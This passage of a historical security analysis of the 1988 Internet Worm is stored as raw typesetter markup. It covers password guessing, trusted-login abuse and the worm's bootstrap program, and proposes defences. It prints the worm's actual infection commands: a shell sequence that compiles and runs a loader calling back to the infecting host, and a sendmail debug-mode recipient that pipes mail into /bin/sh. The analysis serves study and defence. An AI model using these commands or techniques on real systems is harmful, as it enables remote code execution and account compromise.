3683(works.)S
4027(Stories)S
4351(are)S
4518(often)S
4769(related)S
6408 V
720(about)S
976(how)S
1182(system)S
1494(administrators)S
2100(will)S
2290(attempt)S
2624(to)S
2736(write)S
2975(new)S
3174(device)S
3467(drivers)S
3777(or)S
3893(otherwise)S
4314(modify)S
4636(the)S
4791(kernel)S
6528 V
720(of)S
833(the)S
985(operating)S
1392(system,)S
1725(yet)S
1877(they)S
2079(will)S
2265(not)S
2423(willingly)S
2815(attempt)S
3145(to)S
3253(modify)S
3572(sendmail)S
3963(or)S
4076(its)S
4201(con\256guration)S
4764(\256les.)S
6684 V
970(It)S
1070(is)S
1176(little)S
1399(wonder,)S
1762(then,)S
1998(that)S
2187(bugs)S
2415(are)S
2576(present)S
2904(in)S
3022(sendmail)S
3423(that)S
3613(allow)S
3875(unexpected)S
4369(behavior.)S
4813(Other)S
6804 V
720(\257aws)S
974(have)S
1204(been)S
1434(found)S
1709(and)S
1895(reported)S
2269(now)S
2483(that)S
2675(attention)S
3067(has)S
3242(been)S
3472(focused)S
3824(on)S
3966(the)S
4130(program,)S
4535(but)S
4705(it)S
4803(is)S
4912(not)S
6924 V
720(known)S
1022(for)S
1168(sure)S
1364(if)S
1455(all)S
1585(the)S
1737(bugs)S
1956(have)S
2174(been)S
2392(discovered)S
2854(and)S
3028(all)S
3158(the)S
3310(patches)S
3639(circulated.)S
7920 V
EP
%%Page: 5 6
BP
/slant 0 def
/height 1.000000 def
10 R
10 R
480 V
2792(- 5 -)S
840 V
10 B
720(3.3.)S
930(Passwords)S
996 V
10 R
970(A)S
1080(key)S
1262(attack)S
1538(of)S
1659(the)S
1819(Worm)S
2112(program)S
2488(involved)S
2876(attempts)S
3254(to)S
3371(discover)S
3748(user)S
3953(passwords.)S
4463(It)S
4563(was)S
4757(able)S
4962(to)S
1116 V
720(determine)S
1151(success)S
1483(because)S
1831(the)S
1986(encrypted)S
2412(password)S
1066 V
7 R
2789(*)S
1116 V
10 R
2857(of)S
2973(each)S
3188(user)S
3387(was)S
3575(in)S
3686(a)S
3763(publicly-readable)S
4494(\256le.)S
4710(In)S
4826(U)S
8 R
4898(NIX)S
1236 V
10 R
720(systems,)S
1101(the)S
1262(user)S
1467(provides)S
1850(a)S
1933(password)S
2349(at)S
2460(sign-on)S
2799(to)S
2916(verify)S
3193(identity.)S
3593(The)S
3787(password)S
4203(is)S
4309(encrypted)S
4741(using)S
4996(a)S
1356 V
720(permuted)S
1131(version)S
1459(of)S
1576(the)S
1732(Data)S
1954(Encryption)S
2432(Standard)S
2821(\(DES\))S
3110(algorithm,)S
3558(and)S
3736(the)S
3892(result)S
4148(is)S
4250(compared)S
4678(against)S
4996(a)S
1476 V
720(previously)S
1187(encrypted)S
1624(version)S
1962(present)S
2294(in)S
2416(a)S
2504(world-readable)S
3151(accounting)S
3633(\256le.)S
3860(If)S
3970(a)S
4058(match)S
4346(occurs,)S
4675(access)S
4973(is)S
1596 V
720(allowed.)S
1123(No)S
1278(plaintext)S
1661(passwords)S
2110(are)S
2264(contained)S
2685(in)S
2796(the)S
2951(\256le,)S
3137(and)S
3314(the)S
3469(algorithm)S
3891(is)S
3991(supposedly)S
4474(non-invertible)S
1716 V
720(without)S
1056(knowledge)S
1524(of)S
1637(the)S
1789(password.)S
1872 V
970(The)S
1159(organization)S
1692(of)S
1809(the)S
1965(passwords)S
2415(in)S
2527(U)S
8 R
2599(NIX)S
10 R
2776(allows)S
3072(non-privileged)S
3695(commands)S
4163(to)S
4276(make)S
4527(use)S
4695(of)S
4813(infor-)S
1992 V
720(mation)S
1034(stored)S
1314(in)S
1428(the)S
1585(accounts)S
1969(\256le,)S
2157(including)S
2570(authenti\256cation)S
3227(schemes)S
3600(using)S
3852(user)S
4053(passwords.)S
4559(However,)S
4984(it)S
2112 V
720(also)S
919(allows)S
1218(an)S
1350(attacker)S
1704(to)S
1821(encrypt)S
2159(lists)S
2360(of)S
2482(possible)S
2849(passwords)S
3304(and)S
3487(then)S
3698(compare)S
4080(them)S
4319(against)S
4641(the)S
4802(actual)S
2232 V
720(passwords)S
1175(without)S
1520(calling)S
1831(any)S
2014(system)S
2331(function.)S
2758(In)S
2879(e)S
2923 H
	(f)show 10 -.5 mul h (f)show
10 R
2984(ect,)S
3163(the)S
3323(security)S
3677(of)S
3798(the)S
3958(passwords)S
4412(is)S
4517(provided)S
4940(by)S
2352 V
720(the)S
875(prohibitive)S
1347(e)S
1391 H
	(f)show 10 -.5 mul h (f)show
10 R
1452(ort)S
1596(of)S
1712(trying)S
1984(this)S
2162(approach)S
2560(with)S
2771(all)S
2904(combinations)S
3477(of)S
3594(letters.)S
3927(Unfortunately,)S
4546(as)S
4663(machines)S
2472 V
720(get)S
892(faster,)S
1188(the)S
1360(cost)S
1571(of)S
1704(such)S
1936(attempts)S
2324(decreases.)S
2809(Dividing)S
3214(the)S
3385(task)S
3595(among)S
3916(multiple)S
4299(processors)S
4769(further)S
2592 V
720(reduces)S
1066(the)S
1230(time)S
1450(needed)S
1774(to)S
1894(decrypt)S
2235(a)S
2321(password.)S
2795(Such)S
3037(attacks)S
3356(are)S
3519(also)S
3722(made)S
3981(easier)S
4256(when)S
4515(users)S
4763(choose)S
2712 V
720(obvious)S
1071(or)S
1188(common)S
1572(words)S
1850(for)S
2000(their)S
2217(passwords.)S
2722(An)S
2878(attacker)S
3227(need)S
3449(only)S
3661(try)S
3806(lists)S
4002(of)S
4119(common)S
4502(words)S
4779(until)S
4996(a)S
2832 V
720(match)S
994(is)S
1091(found.)S
2988 V
970(The)S
1162(Worm)S
1454(used)S
1674(such)S
1894(an)S
2025(attack)S
2300(to)S
2415(break)S
2673(passwords.)S
3181(It)S
3279(used)S
3499(lists)S
3698(of)S
3819(words,)S
4126(including)S
4542(the)S
4702(standard)S
3108 V
720(online)S
1010(dictionary,)S
1480(as)S
1603(potential)S
1993(passwords.)S
2504(It)S
2605(encrypted)S
3038(them)S
3278(using)S
3535(a)S
3619(fast)S
3803(version)S
4136(of)S
4258(the)S
4419(password)S
4835(algo-)S
3228 V
720(rithm)S
983(and)S
1173(then)S
1391(compared)S
1830(the)S
1998(result)S
2266(against)S
2595(the)S
2763(contents)S
3142(of)S
3271(the)S
3440(system)S
3765(\256le.)S
3995(The)S
4197(Worm)S
4499(exploited)S
4918(the)S
3348 V
720(accessibility)S
1250(of)S
1369(the)S
1527(\256le)S
1691(coupled)S
2043(with)S
2257(the)S
2415(tendency)S
2811(of)S
2930(users)S
3171(to)S
3285(choose)S
3598(common)S
3984(words)S
4263(as)S
4381(their)S
4599(passwords.)S
3468 V
720(Some)S
978(sites)S
1186(reported)S
1548(that)S
1728(over)S
1935(50%)S
2148(of)S
2261(their)S
2474(passwords)S
2920(were)S
3143(quickly)S
3473(broken)S
3780(by)S
3910(this)S
4085(simple)S
4382(approach.)S
3624 V
970(One)S
1173(way)S
1377(to)S
1493(reduce)S
1796(the)S
1956(risk)S
2144(of)S
2265(such)S
2486(attacks,)S
2826(and)S
3008(an)S
3140(approach)S
3543(that)S
3731(has)S
3902(already)S
4233(been)S
4459(taken)S
4713(in)S
4829(some)S
3744 V
720(variants)S
1074(of)S
1195(U)S
8 R
1267(NIX)S
10 R
1409(,)S
1472(is)S
1577(to)S
1693(have)S
1919(a)S
10 I
2001(shadow)S
10 R
2345(password)S
2760(\256le.)S
2981(The)S
3174(encrypted)S
3605(passwords)S
4058(are)S
4216(saved)S
4480(in)S
4595(a)S
4676(\256le)S
4841(\(sha-)S
3864 V
720(dow\))S
958(that)S
1141(is)S
1242(readable)S
1613(only)S
1825(by)S
1959(the)S
2115(system)S
2427(administrators,)S
3058(and)S
3236(a)S
3314(privileged)S
3753(call)S
3931(performs)S
4325(password)S
4736(encryp-)S
3984 V
720(tions)S
947(and)S
1123(comparisons)S
1660(with)S
1870(an)S
1996(appropriate)S
2482(timed)S
2742(delay)S
2990(\(.5)S
3130(to)S
3240(1)S
3322(second,)S
3656(for)S
3804(instance\).)S
4251(This)S
4460(would)S
4741(prevent)S
4104 V
720(any)S
901(attempt)S
1238(to)S
1353(``\256sh'')S
1667(for)S
1820(passwords.)S
2328(Additionally,)S
2897(a)S
2979(threshold)S
3389(could)S
3649(be)S
3781(included)S
4163(to)S
4279(check)S
4549(for)S
4703(repeated)S
4224 V
720(password)S
1136(attempts)S
1514(from)S
1747(the)S
1908(same)S
2151(process,)S
2513(resulting)S
2901(in)S
3017(some)S
3266(form)S
3498(of)S
3619(alarm)S
3884(being)S
4144(raised.)S
4475(Shadow)S
4835(pass-)S
4344 V
720(word)S
962(\256les)S
1166(should)S
1471(be)S
1603(used)S
1824(in)S
1940(combination)S
2478(with)S
2694(encryption)S
3159(rather)S
3429(than)S
3639(in)S
3755(place)S
4003(of)S
4124(such)S
4345(techniques,)S
4835(how-)S
4464 V
720(ever,)S
950(or)S
1067(one)S
1245(problem)S
1612(is)S
1713(simply)S
2020(replaced)S
2391(by)S
2525(a)S
2602(di)S
2680 H
	(f)show 10 -.5 mul h (f)show
10 R
2741(erent)S
2973(one)S
3150(\(securing)S
3554(the)S
3709(shadow)S
4047(\256le\);)S
4269(the)S
4424(combination)S
4957(of)S
4584 V
720(the)S
872(two)S
1052(methods)S
1421(is)S
1518(stronger)S
1875(than)S
2077(either)S
2334(one)S
2508(alone.)S
4740 V
970(Another)S
1336(way)S
1541(to)S
1658(strengthen)S
2114(the)S
2276(password)S
2693(mechanism)S
3188(would)S
3478(be)S
3612(to)S
3730(change)S
4052(the)S
4214(utility)S
4494(that)S
4684(sets)S
4874(user)S
4860 V
720(passwords.)S
1231(The)S
1425(utility)S
1704(currently)S
2103(makes)S
2397(minimal)S
2770(attempt)S
3109(to)S
3226(ensure)S
3525(that)S
3714(new)S
3919(passwords)S
4374(are)S
4534(nontrivial)S
4962(to)S
4980 V
720(guess.)S
1043(The)S
1244(program)S
1628(could)S
1896(be)S
2036(strengthened)S
2592(in)S
2717(such)S
2947(a)S
3038(way)S
3251(that)S
3448(it)S
3551(would)S
3848(reject)S
4116(any)S
4307(choice)S
4614(of)S
4744(a)S
4835(word)S
5100 V
720(currently)S
1110(in)S
1218(the)S
1370(on-line)S
1683(dictionary)S
2118(or)S
2231(based)S
2488(on)S
2618(the)S
2770(account)S
3110(name.)S
5256 V
970(A)S
1081(related)S
1391(\257aw)S
1603(exploited)S
2015(by)S
2155(the)S
2317(Worm)S
2612(involved)S
3002(the)S
3164(use)S
3337(of)S
3460(trusted)S
3772(logins.)S
4112(One)S
4318(useful)S
4602(features)S
4957(of)S
5376 V
720(BSD)S
950(U)S
8 R
1022(NIX)S
10 R
1164(-based)S
1459(networking)S
1949(code)S
2172(is)S
2274(its)S
2404(support)S
2739(for)S
2890(executing)S
3313(tasks)S
3548(on)S
3683(remote)S
3995(machines.)S
4462(To)S
4607(avoid)S
4863(hav-)S
5496 V
720(ing)S
886(repeatedly)S
1339(to)S
1455(type)S
1665(passwords)S
2119(to)S
2235(access)S
2528(remote)S
2844(accounts,)S
3257(it)S
3352(is)S
3458(possible)S
3825(for)S
3980(a)S
4063(user)S
4268(to)S
4385(specify)S
4712(a)S
4795(list)S
4957(of)S
5616 V
720(host/login)S
1169(name)S
1433(pairs)S
1675(that)S
1873(are)S
2042(assumed)S
2434(to)S
2560(be)S
2702(``trusted,'')S
3179(in)S
3304(the)S
3473(sense)S
3736(that)S
3933(a)S
4024(remote)S
4348(access)S
4649(from)S
4890(that)S
5736 V
720(host/login)S
1158(pair)S
1350(is)S
1454(never)S
1712(asked)S
1976(for)S
2129(a)S
2210(password.)S
2680(This)S
2896(feature)S
3210(has)S
3381(often)S
3624(been)S
3850(responsible)S
4343(for)S
4497(users)S
4740(gaining)S
5856 V
720(unauthorized)S
1271(access)S
1555(to)S
1663(machines)S
2070(\(cf.)S
2235([21]\),)S
2489(but)S
2647(it)S
2733(continues)S
3146(to)S
3254(be)S
3378(used)S
3591(because)S
3936(of)S
4049(its)S
4174(great)S
4403(convenience.)S
6012 V
970(The)S
1166(Worm)S
1462(exploited)S
1875(the)S
2038(mechanism)S
2534(by)S
2675(trying)S
2955(to)S
3075(locate)S
3355(machines)S
3774(that)S
3966(might)S
4242(``trust'')S
4594(the)S
4758(current)S
6132 V
720(machine/login)S
1360(being)S
1650(used)S
1901(by)S
2069(the)S
2259(Worm.)S
2637(This)S
2883(was)S
3106(done)S
3368(by)S
3536(examining)S
4026(\256les)S
4261(that)S
4479(listed)S
4763(remote)S
6252 V
720(machine/logins)S
1371(trusted)S
1683(by)S
1823(the)S
1985(current)S
2307(host.)S
6202 V
7 R
2499(*)S
6252 V
10 R
2574(Often,)S
2866(machines)S
3283(and)S
3467(accounts)S
3856(are)S
4017(con\256gured)S
4485(for)S
4642(reciprocal)S
6372 V
720(trust.)S
1007(Once)S
1271(the)S
1447(Worm)S
1756(found)S
2043(such)S
2280(likely)S
2562(candidates,)S
3062(it)S
3172(would)S
3475(attempt)S
3828(to)S
3959(instantiate)S
4423(itself)S
4676(on)S
4829(those)S
6492 V
720(machines)S
1134(by)S
1271(using)S
1525(the)S
1684(remote)S
1998(execution)S
2423(facility\320copying)S
3165(itself)S
3402(to)S
3517(the)S
3676(remote)S
3990(machines)S
4404(as)S
4524(if)S
4622(it)S
4715(were)S
4946(an)S
6612 V
720(authorized)S
1171(user)S
1367(performing)S
1846(a)S
1920(standard)S
2288(remote)S
2595(operation.)S
6744 V
8 Y1
720(333333333333333333)S
6862 V
8 R
820(*)S
900(Strictly)S
1162(speaking,)S
1493(the)S
1619(password)S
1949(is)S
2031(not)S
2162(encrypted.)S
2548(A)S
2635(block)S
2841(of)S
2936(zero)S
3101(bits)S
3245(is)S
3327(repeatedly)S
3686(encrypted)S
4028(using)S
4230(the)S
4356(user)S
4517(pass-)S
6962 V
720(word,)S
928(and)S
1067(the)S
1188(results)S
1419(of)S
1509(this)S
1648(encryption)S
2012(is)S
2089(what)S
2268(is)S
2345(saved.)S
2594(See)S
2733([4])S
2849(and)S
2988([19])S
3144(for)S
3260(more)S
3447(details.)S
7080 V
820(*)S
900(The)S
8 I
1048(hosts.equiv)S
8 R
1428(and)S
1567(per-user)S
8 I
1850(.rhosts)S
8 R
2089(\256les)S
2246(referred)S
2519(to)S
2605(later.)S
7920 V
EP
%%Page: 6 7
BP
/slant 0 def
/height 1.000000 def
8 R
8 R
480 V
10 R
2792(- 6 -)S
840 V
970(To)S
1117(defeat)S
1396(future)S
1670(such)S
1889(attempts)S
2264(requires)S
2621(that)S
2807(the)S
2965(current)S
3283(remote)S
3596(access)S
3887(mechanism)S
4379(be)S
4510(removed)S
4896(and)S
960 V
720(possibly)S
1092(replaced)S
1467(with)S
1683(something)S
2138(else.)S
2385(One)S
2588(mechanism)S
3080(that)S
3267(shows)S
3554(promise)S
3913(in)S
4028(this)S
4210(area)S
4412(is)S
4516(the)S
4675(Kerberos)S
1080 V
720(authenti\256cation)S
1373(server)S
1647([28].)S
1899(This)S
2108(scheme)S
2438(uses)S
2641(dynamic)S
3016(session)S
3337(keys)S
3552(that)S
3734(need)S
3954(to)S
4064(be)S
4190(updated)S
4538(periodically.)S
1200 V
720(Thus,)S
975(an)S
1099(invader)S
1428(could)S
1680(not)S
1838(make)S
2084(use)S
2247(of)S
2360(static)S
2601(authorizations)S
3197(present)S
3515(in)S
3623(the)S
3775(\256le)S
3933(system.)S
1440 V
10 B
720(3.4.)S
930(High)S
1172(Level)S
1435(Description)S
1596 V
10 R
970(The)S
1161(Worm)S
1452(consisted)S
1860(of)S
1979(two)S
2165(parts:)S
2423(a)S
2504(main)S
2741(program,)S
3141(and)S
3322(a)S
3403(bootstrap)S
3812(or)S
10 I
3932(vector)S
10 R
4218(program.)S
4648(The)S
4840(main)S
1716 V
720(program,)S
1120(once)S
1345(established)S
1826(on)S
1962(a)S
2042(machine,)S
2441(would)S
2727(collect)S
3029(information)S
3537(on)S
3673(other)S
3914(machines)S
4327(in)S
4441(the)S
4599(network)S
4962(to)S
1836 V
720(which)S
1001(the)S
1160(current)S
1479(machine)S
1854(could)S
2113(connect.)S
2515(It)S
2613(would)S
2900(do)S
3037(this)S
3219(by)S
3357(reading)S
3694(public)S
3982(con\256guration)S
4553(\256les)S
4758(and)S
4940(by)S
1956 V
720(running)S
1069(system)S
1385(utility)S
1662(programs)S
2076(that)S
2263(present)S
2588(information)S
3097(about)S
3356(the)S
3515(current)S
3834(state)S
4054(of)S
4174(network)S
4538(connections.)S
2076 V
720(It)S
815(would)S
1099(then)S
1305(attempt)S
1639(to)S
1751(use)S
1919(the)S
2076(\257aws)S
2322(described)S
2739(above)S
3012(to)S
3125(establish)S
3510(its)S
3640(bootstrap)S
4047(on)S
4182(each)S
4399(of)S
4517(those)S
4763(remote)S
2196 V
720(machines.)S
2352 V
970(The)S
1158(bootstrap)S
1563(was)S
1751(99)S
1884(lines)S
2106(of)S
2222(C)S
2322(code)S
2543(that)S
2726(would)S
3009(be)S
3136(compiled)S
3542(and)S
3720(run)S
3887(on)S
4021(the)S
4177(remote)S
4488(machine.)S
4885(The)S
2472 V
720(source)S
1011(for)S
1158(this)S
1334(program)S
1703(would)S
1984(be)S
2109(transferred)S
2571(to)S
2680(the)S
2833(victim)S
3120(machine)S
3489(using)S
3737(one)S
3912(of)S
4026(the)S
4179(methods)S
4549(discussed)S
4962(in)S
2592 V
720(the)S
873(next)S
1076(section.)S
1445(It)S
1537(would)S
1818(then)S
2021(be)S
2146(compiled)S
2549(and)S
2725(invoked)S
3079(on)S
3211(the)S
3365(victim)S
3653(machine)S
4023(with)S
4233(three)S
4464(command)S
4890(line)S
2712 V
720(arguments:)S
1195(the)S
1348(network)S
1706(address)S
2036(of)S
2150(the)S
2303(infecting)S
2689(machine,)S
3083(the)S
3236(number)S
3571(of)S
3684(the)S
3836(network)S
4193(port)S
4384(to)S
4492(connect)S
4832(to)S
4940(on)S
2832 V
720(that)S
907(machine)S
1282(to)S
1397(get)S
1556(copies)S
1848(of)S
1968(the)S
2127(main)S
2364(Worm)S
2656(\256les,)S
2885(and)S
3066(a)S
10 I
3147(magic)S
3428(number)S
10 R
3770(that)S
3957(e)S
4001 H
	(f)show 10 -.5 mul h (f)show
10 R
4062(ectively)S
4415(acted)S
4662(as)S
4782(a)S
4863(one-)S
2952 V
720(time-challenge)S
1353(password.)S
1825(If)S
1931(the)S
2093(``server'')S
2508(Worm)S
2803(on)S
2943(the)S
3105(remote)S
3422(host)S
3629(and)S
3813(port)S
4014(did)S
4181(not)S
4348(receive)S
4674(the)S
4835(same)S
3072 V
720(magic)S
1007(number)S
1355(back)S
1587(before)S
1885(starting)S
2229(the)S
2395(transfer,)S
2768(it)S
2868(would)S
3162(immediately)S
3706(disconnect)S
4177(from)S
4415(the)S
4581(vector)S
4874(pro-)S
3192 V
720(gram.)S
1020(This)S
1238(may)S
1450(have)S
1678(been)S
1906(done)S
2140(to)S
2258(prevent)S
2597(someone)S
2992(from)S
3226(attempting)S
3694(to)S
3812(``capture'')S
4277(the)S
4439(binary)S
4734(\256les)S
4940(by)S
3312 V
720(spoo\256ng)S
1095(a)S
1169(Worm)S
1454(``server.'')S
3468 V
970(This)S
1178(code)S
1396(also)S
1587(went)S
1811(to)S
1919(some)S
2160(e)S
2204 H
	(f)show 10 -.5 mul h (f)show
10 R
2265(ort)S
2406(to)S
2514(hide)S
2716(itself,)S
2971(both)S
3179(by)S
3310(zeroing)S
3640(out)S
3799(its)S
3925(argument)S
4333(vector)S
4613(\(command)S
3588 V
720(line)S
908(image\),)S
1248(and)S
1430(by)S
1568(immediately)S
2106(forking)S
2438(a)S
2520(copy)S
2752(of)S
2872(itself.)S
3164(If)S
3267(a)S
3348(failure)S
3645(occurred)S
4030(in)S
4145(transferring)S
4647(a)S
4728(\256le,)S
4918(the)S
3708 V
720(code)S
938(deleted)S
1256(all)S
1386(\256les)S
1583(it)S
1669(had)S
1843(already)S
2166(transferred,)S
2682(then)S
2884(it)S
2970(exited.)S
3864 V
970(Once)S
1222(established)S
1708(on)S
1850(the)S
2014(target)S
2283(machine,)S
2688(the)S
2852(bootstrap)S
3266(would)S
3558(connect)S
3910(back)S
4140(to)S
4260(the)S
4424(instance)S
4793(of)S
4918(the)S
3984 V
720(Worm)S
1011(that)S
1197(originated)S
1638(it)S
1730(and)S
1910(transfer)S
2250(a)S
2330(set)S
2477(of)S
2596(binary)S
2887(\256les)S
3090(\(precompiled)S
3658(code\))S
3914(to)S
4027(the)S
4184(local)S
4413(machine.)S
4841(Each)S
4104 V
720(binary)S
1006(\256le)S
1165(represented)S
1656(a)S
1732(version)S
2058(of)S
2173(the)S
2327(main)S
2559(Worm)S
2846(program,)S
3241(compiled)S
3645(for)S
3793(a)S
3869(particular)S
4283(computer)S
4692(architec-)S
4224 V
720(ture)S
909(and)S
1087(operating)S
1498(system)S
1810(version.)S
2193(The)S
2382(bootstrap)S
2788(would)S
3072(also)S
3267(transfer)S
3605(a)S
3683(copy)S
3910(of)S
4026(itself)S
4259(for)S
4408(use)S
4574(in)S
4685(infecting)S
4344 V
720(other)S
955(systems.)S
1358(One)S
1555(curious)S
1880(feature)S
2187(of)S
2301(the)S
2454(bootstrap)S
2857(has)S
3021(provoked)S
3429(many)S
3682(questions,)S
4116(as)S
4230(yet)S
4383(unanswered:)S
4918(the)S
4464 V
720(program)S
1100(had)S
1286(data)S
1494(structures)S
1924(allocated)S
2326(to)S
2446(enable)S
2748(transfer)S
3094(of)S
3219(up)S
3361(to)S
3481(20)S
3623(\256les;)S
3860(it)S
3958(was)S
4154(used)S
4378(with)S
4597(only)S
4816(three.)S
4584 V
720(This)S
934(has)S
1103(led)S
1261(to)S
1375(speculation)S
1866(whether)S
2223(a)S
2303(more)S
2544(extensive)S
2957(version)S
3287(of)S
3406(the)S
3564(Worm)S
3856(was)S
4048(planned)S
4401(for)S
4554(a)S
4635(later)S
4849(date,)S
4704 V
720(and)S
898(if)S
993(that)S
1177(version)S
1505(might)S
1773(have)S
1995(carried)S
2305(with)S
2517(it)S
2606(other)S
2844(command)S
3271(\256les,)S
3496(password)S
3906(data,)S
4130(or)S
4246(possibly)S
4613(local)S
4840(virus)S
4824 V
720(or)S
833(trojan)S
1096(horse)S
1342(programs.)S
4980 V
970(Once)S
1217(the)S
1376(binary)S
1668(\256les)S
1872(were)S
2102(transferred,)S
2595(the)S
2754(bootstrap)S
3164(program)S
3540(would)S
3828(load)S
4038(and)S
4220(link)S
4414(these)S
4657(\256les)S
4862(with)S
5100 V
720(the)S
882(local)S
1116(versions)S
1489(of)S
1612(the)S
1774(standard)S
2151(libraries.)S
2572(One)S
2777(after)S
2998(another,)S
3361(these)S
3605(programs)S
4021(were)S
4253(invoked.)S
4669(If)S
4774(one)S
4957(of)S
5220 V
720(them)S
950(ran)S
1107(successfully,)S
1650(it)S
1736(read)S
1937(into)S
2123(its)S
2248(memory)S
2611(copies)S
2896(of)S
3009(the)S
3161(bootstrap)S
3563(and)S
3737(binary)S
4023(\256les)S
4221(and)S
4396(then)S
4599(deleted)S
4918(the)S
5340 V
720(copies)S
1013(on)S
1151(disk.)S
1410(It)S
1508(would)S
1795(then)S
2004(attempt)S
2341(to)S
2456(break)S
2714(into)S
2907(other)S
3149(machines.)S
3618(If)S
3721(none)S
3952(of)S
4072(the)S
4231(linked)S
4518(versions)S
4888(ran,)S
5460 V
720(then)S
925(the)S
1080(mechanism)S
1568(running)S
1912(the)S
2067(bootstrap)S
2472(\(a)S
2582(command)S
3009(\256le)S
3171(or)S
3288(the)S
3444(parent)S
3727(worm\))S
4027(would)S
4311(delete)S
4583(all)S
4717(the)S
4873(disk)S
5580 V
720(\256les)S
917(created)S
1234(during)S
1525(the)S
1677(attempted)S
2101(infection.)S
5820 V
10 B
720(3.5.)S
930(Step-by-step)S
1493(description)S
5976 V
10 R
970(This)S
1204(section)S
1543(contains)S
1932(a)S
2032(more)S
2293(detailed)S
2665(overview)S
3092(of)S
3231(how)S
3460(the)S
3639(Worm)S
3951(program)S
4346(functioned.)S
4885(The)S
6096 V
720(description)S
1205(in)S
1324(this)S
1510(section)S
1834(assumes)S
2208(that)S
2399(the)S
2561(reader)S
2849(is)S
2956(somewhat)S
3401(familiar)S
3757(with)S
3975(standard)S
4353(U)S
8 R
4425(NIX)S
10 R
4607(commands)S
6216 V
720(and)S
905(with)S
1125(BSD)S
1362(U)S
8 R
1434(NIX)S
10 R
1618(network)S
1987(facilities.)S
2428(A)S
2542(more)S
2789(detailed)S
3147(analysis)S
3511(of)S
3636(operation)S
4055(and)S
4241(components)S
4766(can)S
4946(be)S
6336 V
720(found)S
983(in)S
1091([26],)S
1312(with)S
1520(additional)S
1950(details)S
2241(in)S
2349([10])S
2545(and)S
2719([24].)S
6492 V
970(This)S
1182(description)S
1660(starts)S
1905(from)S
2133(the)S
2289(point)S
2529(at)S
2635(which)S
2913(a)S
2991(host)S
3192(is)S
3293(about)S
3549(to)S
3661(be)S
3789(infected.)S
4199(A)S
4305(Worm)S
4594(running)S
4940(on)S
6612 V
720(another)S
1056(machine)S
1431(has)S
1601(either)S
1865(succeeded)S
2311(in)S
2426(establishing)S
2941(a)S
3022(shell)S
3248(on)S
3385(the)S
3544(new)S
3746(host)S
3949(and)S
4129(has)S
4298(connected)S
4738(back)S
4962(to)S
6732 V
720(the)S
874(infecting)S
1261(machine)S
1631(via)S
1785(a)S
1861(TCP)S
2077(connection,)S
6682 V
7 R
2540(*)S
6732 V
10 R
2607(or)S
2722(it)S
2810(has)S
2976(connected)S
3413(to)S
3524(the)S
3679(SMTP)S
3974(port)S
4168(and)S
4345(is)S
4445(transmitting)S
4962(to)S
6852 V
720(the)S
872(sendmail)S
1263(program.)S
6962 V
8 Y1
720(333333333333333333)S
7080 V
8 R
820(*)S
900(Internet)S
1170(reliable)S
1431(stream)S
1666(connection.)S
7920 V
EP
%%Page: 7 8
BP
/slant 0 def
/height 1.000000 def
8 R
8 R
480 V
10 R
2792(- 7 -)S
840 V
720(The)S
905(infection)S
1290(proceeded)S
1729(as)S
1842(follows:)S
996 V
720(1\))S
970(A)S
1072(socket)S
1357(was)S
1542(established)S
2016(on)S
2146(the)S
2298(infecting)S
2683(machine)S
3051(for)S
3197(the)S
3349(vector)S
3628(program)S
3996(to)S
4104(connect)S
4444(to)S
4552(\(e.g.,)S
4785(socket)S
1116 V
970(number)S
1307(32341\).)S
1677(A)S
1781(challenge)S
2195(string)S
2455(was)S
2642(constructed)S
3134(from)S
3360(a)S
3435(random)S
3771(number)S
4107(\(e.g.,)S
4340(8712440\).)S
4809(A)S
4912(\256le)S
1236 V
970(name)S
1216(base)S
1423(was)S
1608(also)S
1799(constructed)S
2289(using)S
2536(a)S
2610(random)S
2945(number)S
3280(\(e.g.,)S
3512(14481910\).)S
1392 V
720(2\))S
970(The)S
1155(vector)S
1434(program)S
1802(was)S
1987(installed)S
2356(and)S
2530(executed)S
2914(using)S
3161(one)S
3335(of)S
3448(two)S
3628(methods:)S
1548 V
970(2a\))S
1220(Across)S
1529(a)S
1605(TCP)S
1821(connection)S
2291(to)S
2401(a)S
2477(shell,)S
2723(the)S
2877(Worm)S
3164(would)S
3446(send)S
3661(the)S
3815(following)S
4236(commands)S
4702(\(the)S
4890(two)S
1668 V
1220(lines)S
1439(beginning)S
1869(with)S
2077(``cc'')S
2327(were)S
2550(sent)S
2741(as)S
2854(a)S
2928(single)S
3197(line\):)S
1861 V
12 C
1220(PATH=/bin:/usr/bin:/usr/ucb)S
1994 V
1220(cd)S
1436(/usr/tmp)S
2127 V
1220(echo)S
1580(gorch49;)S
2228(sed)S
2516('/int)S
2948(zz/q')S
3380(>)S
3524(x14481910.c;echo)S
4748(gorch50)S
2260 V
1220([text)S
1652(of)S
1868(vector)S
2372(program])S
2393 V
1220(int)S
1508(zz;)S
2526 V
1220(cc)S
1436(-o)S
1652(x14481910)S
2372(x14481910.c;./x14481910)S
4100(128.32.134.16)S
5108(32341)S
5540(8712440;)S
2659 V
1220(rm)S
1436(-f)S
1652(x14481910)S
2372(x14481910.c;echo)S
3596(DONE)S
2839 V
10 R
1220(Then)S
1455(it)S
1541(would)S
1821(wait)S
2023(for)S
2169(the)S
2321(string)S
2579(``DONE'')S
3018(to)S
3126(signal)S
3395(that)S
3575(the)S
3727(vector)S
4006(program)S
4374(was)S
4559(running.)S
2995 V
970(2b\))S
1220(Using)S
1491(the)S
1645(SMTP)S
1939(connection,)S
2434(it)S
2522(would)S
2804(transmit)S
3164(\(the)S
3351(two)S
3534(lines)S
3756(beginning)S
4189(with)S
4400(``cc'')S
4653(were)S
4879(sent)S
3115 V
1220(as)S
1333(a)S
1407(single)S
1676(line\):)S
3308 V
12 C
1220(debug)S
3441 V
1220(mail)S
1580(from:)S
2012(</dev/null>)S
3574 V
1220(rcpt)S
1580(to:)S
1868(<"|sed)S
2372(-e)S
2588('1,/^$/'d)S
3308(|)S
3452(/bin/sh)S
4028(;)S
4172(exit)S
4532(0">)S
3707 V
1220(data)S
3973 V
1220(cd)S
1436(/usr/tmp)S
4106 V
1220(cat)S
1508(>)S
1652(x14481910.c)S
2516(<<'EOF')S
4239 V
1220([text)S
1652(of)S
1868(vector)S
2372(program])S
4372 V
1220(EOF)S
4505 V
1220(cc)S
1436(-o)S
1652(x14481910)S
2372(x14481910.c;x14481910)S
3956(128.32.134.16)S
4964(32341)S
5396(8712440;)S
4638 V
1220(rm)S
1436(-f)S
1652(x14481910)S
2372(x14481910.c)S
4904 V
1220(.)S
5037 V
1220(quit)S
5253 V
10 R
970(The)S
1162(infecting)S
1554(Worm)S
1846(would)S
2133(then)S
2342(wait)S
2551(for)S
2704(up)S
2841(to)S
2956(2)S
3044(minutes)S
3399(on)S
3537(the)S
3697(designated)S
4162(port)S
4361(for)S
